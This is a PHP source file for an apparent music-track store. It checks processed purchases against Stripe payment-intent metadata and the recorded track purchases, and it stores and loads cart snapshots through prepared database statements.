<?php
/**
 * Purchase Validation System
 * Validates that purchases match what was in the cart
 * Should be called after each purchase is processed
 */

require_once __DIR__ . '/../config/database.php';

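/**
 * Validate a processed purchase against the Stripe payment intent metadata.
 *
 * Fetches the payment intent from the Stripe API, derives the track IDs the
 * buyer paid for (the `cart_items` JSON in the metadata plus the
 * single-purchase `track_id` field) and compares them with the rows recorded
 * in `track_purchases` for this intent and user.
 *
 * The Stripe secret is read from configuration (the STRIPE_SECRET_KEY
 * environment variable, falling back to a STRIPE_SECRET_KEY constant if the
 * config layer defines one). A secret that was ever hard-coded in this file
 * has to be treated as exposed and rotated in the Stripe dashboard.
 *
 * @param string     $payment_intent_id Stripe payment intent id
 * @param int|string $user_id           Local user id the purchase belongs to
 * @return array{valid: bool, issues: list<string>, expected?: list<int>, actual?: list<int>}
 *         'valid' is true only when no issue was found; 'expected' and
 *         'actual' are present only when the comparison was actually run.
 */
function validatePurchase($payment_intent_id, $user_id): array {
    $pdo = getDBConnection();
    $issues = [];

    $stripe_secret = getenv('STRIPE_SECRET_KEY');
    if ($stripe_secret === false || $stripe_secret === '') {
        $stripe_secret = defined('STRIPE_SECRET_KEY') ? (string) constant('STRIPE_SECRET_KEY') : '';
    }
    if ($stripe_secret === '') {
        // Fail closed: without a key we cannot prove anything about the purchase.
        $issues[] = "Stripe secret key is not configured (STRIPE_SECRET_KEY)";
        return ['valid' => false, 'issues' => $issues];
    }

    try {
        // Get Stripe payment intent
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL            => 'https://api.stripe.com/v1/payment_intents/' . urlencode($payment_intent_id),
            CURLOPT_HTTPHEADER     => ['Authorization: Bearer ' . $stripe_secret],
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_CONNECTTIMEOUT => 5,
            CURLOPT_TIMEOUT        => 10,
        ]);
        $stripe_response = curl_exec($ch);
        $http_code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $curl_error = curl_error($ch);
        curl_close($ch);

        // curl_exec() returns false on transport failure (timeout, DNS, TLS);
        // report that separately from an HTTP-level error so the log is useful.
        if ($stripe_response === false) {
            $issues[] = "Could not reach Stripe: " . ($curl_error !== '' ? $curl_error : 'unknown cURL error');
            return ['valid' => false, 'issues' => $issues];
        }

        if ($http_code !== 200) {
            $issues[] = "Could not fetch payment intent from Stripe (HTTP {$http_code})";
            return ['valid' => false, 'issues' => $issues];
        }

        $payment = json_decode($stripe_response, true);
        if (!is_array($payment)) {
            $issues[] = "Stripe response was not valid JSON";
            return ['valid' => false, 'issues' => $issues];
        }

        $metadata = $payment['metadata'] ?? [];
        if (!is_array($metadata)) {
            $metadata = [];
        }

        // Parse expected cart items (stored in metadata as a JSON string)
        $cart_items_json = $metadata['cart_items'] ?? '[]';
        $cart_items = is_string($cart_items_json) ? json_decode($cart_items_json, true) : $cart_items_json;

        if (!is_array($cart_items)) {
            $issues[] = "Cart items metadata is invalid or missing";
            return ['valid' => false, 'issues' => $issues];
        }

        // Get expected track IDs
        $expected_track_ids = [];
        foreach ($cart_items as $item) {
            if (is_array($item) && isset($item['type'], $item['track_id']) && $item['type'] === 'track') {
                $expected_track_ids[] = (int) $item['track_id'];
            }
        }

        // Also check for single track purchase
        if (!empty($metadata['track_id'])) {
            $expected_track_ids[] = (int) $metadata['track_id'];
        }

        // Get actual purchases from database
        $stmt = $pdo->prepare("
            SELECT track_id
            FROM track_purchases
            WHERE stripe_payment_intent_id = ? AND user_id = ?
        ");
        $stmt->execute([$payment_intent_id, $user_id]);
        $actual_track_ids = array_map(
            static function ($track_id) { return (int) $track_id; },
            $stmt->fetchAll(PDO::FETCH_COLUMN, 0)
        );

        // Compare both directions: paid-for tracks that were not granted, and
        // granted tracks that were never paid for.
        $missing_tracks = array_diff($expected_track_ids, $actual_track_ids);
        $extra_tracks = array_diff($actual_track_ids, $expected_track_ids);

        if (!empty($missing_tracks)) {
            $issues[] = "Missing tracks: " . implode(', ', $missing_tracks);
        }

        if (!empty($extra_tracks)) {
            $issues[] = "Extra tracks (not in cart): " . implode(', ', $extra_tracks);
        }

        if (count($expected_track_ids) !== count($actual_track_ids)) {
            $issues[] = "Count mismatch: Expected " . count($expected_track_ids) . " tracks, found " . count($actual_track_ids);
        }

        return [
            'valid' => empty($issues),
            'issues' => $issues,
            'expected' => $expected_track_ids,
            'actual' => $actual_track_ids,
        ];

    } catch (Exception $e) {
        $issues[] = "Validation error: " . $e->getMessage();
        return ['valid' => false, 'issues' => $issues];
    }
}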

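/**
 * Persist the cart contents for a payment intent so the purchase can be
 * validated after the charge completes. Storing again for the same key
 * replaces the previous snapshot (ON DUPLICATE KEY UPDATE).
 *
 * @param int|string $user_id
 * @param array      $cart_items        Cart as the checkout code holds it; stored as JSON
 * @param string     $payment_intent_id Stripe payment intent id
 * @return bool true when the row was written; false on encoding or DB failure (logged)
 */
function storeCartSnapshot($user_id, $cart_items, $payment_intent_id): bool {
    $pdo = getDBConnection();

    // Encode before touching the DB: json_encode() returns false on failure
    // (e.g. invalid UTF-8), and letting that reach execute() would silently
    // store an empty string in place of the cart.
    $cart_json = json_encode($cart_items);
    if ($cart_json === false) {
        error_log("Failed to store cart snapshot: " . json_last_error_msg());
        return false;
    }

    try {
        $stmt = $pdo->prepare("
            INSERT INTO cart_snapshots (
                user_id, payment_intent_id, cart_items, created_at
            ) VALUES (?, ?, ?, NOW())
            ON DUPLICATE KEY UPDATE
                cart_items = VALUES(cart_items),
                created_at = NOW()
        ");
        $stmt->execute([$user_id, $payment_intent_id, $cart_json]);

        return true;
    } catch (Exception $e) {
        error_log("Failed to store cart snapshot: " . $e->getMessage());
        return false;
    }
}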

/**
 * Load the most recent cart snapshot stored for a payment intent.
 *
 * @param string $payment_intent_id Stripe payment intent id
 * @return mixed the decoded `cart_items` JSON (normally an array), or null
 *         when no snapshot exists or the query fails (failure is logged)
 */
function getCartSnapshot($payment_intent_id) {
    $pdo = getDBConnection();

    try {
        $query = "
            SELECT cart_items 
            FROM cart_snapshots 
            WHERE payment_intent_id = ?
            ORDER BY created_at DESC
            LIMIT 1
        ";
        $stmt = $pdo->prepare($query);
        $stmt->execute([$payment_intent_id]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);

        // fetch() yields false when no row matched
        if (!$row) {
            return null;
        }

        return json_decode($row['cart_items'], true);
    } catch (Exception $e) {
        error_log("Failed to get cart snapshot: " . $e->getMessage());
        return null;
    }
}
?>